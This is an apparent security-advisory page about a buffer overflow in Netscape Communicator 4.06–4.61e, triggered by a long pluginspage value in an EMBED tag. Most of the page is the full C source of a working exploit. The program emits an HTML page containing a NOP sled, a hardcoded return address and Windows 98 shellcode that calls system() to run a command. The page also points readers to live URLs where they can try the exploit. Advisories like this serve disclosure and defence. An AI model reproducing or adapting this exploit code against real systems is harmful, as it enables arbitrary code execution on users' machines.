|
Brought to you by:
Suppliers of:
|
|
|
| |
| Netscape Communicator versions 4.06, 4.5,4.6 and 4.61e is vulnerable to a buffer overflow when a long string is specified in the pluginspage option of an EMBED tag. This buffer overflow can be used to execute arbitrary code. |
| |
Credit:
This vulnerability and exploit source code has been provided by: DEF CON ZERO WINDOW.
|
| |
Since the buffer overflow tries to execute code which is bound to a memory address (where certain functions reside), an older version of the msvcrt.dll will not work (Expected msvcrt.dll version is 6.00.8397).
You can quickly test this exploit on the site of the person who found the vulnerability:
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi and http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
The following is the source code of the first exploit:
/************************************************************************/
/* Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98 */
/* */
/* written by R00t Zer0(defcon0@ugtop.com) */
/* */
/* DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm) */
/************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
#define STACK_LEN ( 2135 )
#define EMBED_TYPE_LEN ( 150 )
#define XPT_HDL_OFFSET ( 588 )
#define JMPS_OFFSET ( 6 )
#define JMP_EBX_ADDR ( 0xbff7a06b )
#define INT01H_ADDR ( 0xbff73d30 )
#define NOP_CODE ( 0x90 )
#define JMPS_CODE ( 0xeb )
#define FUNCTION "msvcrt.dll.system.exit."
#define COMMAND "welcome.exe"
#define CMDLENP ( 65 )
int
main( void )
{
u_char win98_exec_code[100] = {
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
u_char exploit_code[ STACK_LEN ];
u_char embed_type[ EMBED_TYPE_LEN ];
u_long ip;
int loop;
srand( ( u_int )time( 0 ) );
bzero( exploit_code, sizeof( exploit_code ) );
for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
exploit_code [loop ] = NOP_CODE;
/* make exploit code */
ip = JMP_EBX_ADDR;
exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char)( 0xff & ( ip >> 24 ) );
exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char)( 0xff & ( ip >> 16 ) );
exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char)( 0xff & ( ip >> 8 ) );
exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char)( 0xff & ( ip >> 0 ) );
win98_exec_code[ CMDLENP ] = strlen( COMMAND );
strcat( exploit_code, win98_exec_code );
strcat( exploit_code, FUNCTION );
strcat( exploit_code, COMMAND );
/* set random type */
for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
embed_type[ loop ] = 0x23 + ( rand() % 93 );
/* print html */
printf( "Content-type: text/html\n\n" );
printf( "<HTML>\n" );
printf( "<HEAD>\n" );
printf( " <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
printf( "</HEAD>\n" );
printf( "<BODY>\n" );
printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", exploit_code );
printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", embed_type );
printf( "</EMBED>\n</BODY>\n</HTML>\n" );
return( 0 );
}
|
|
|
|
|
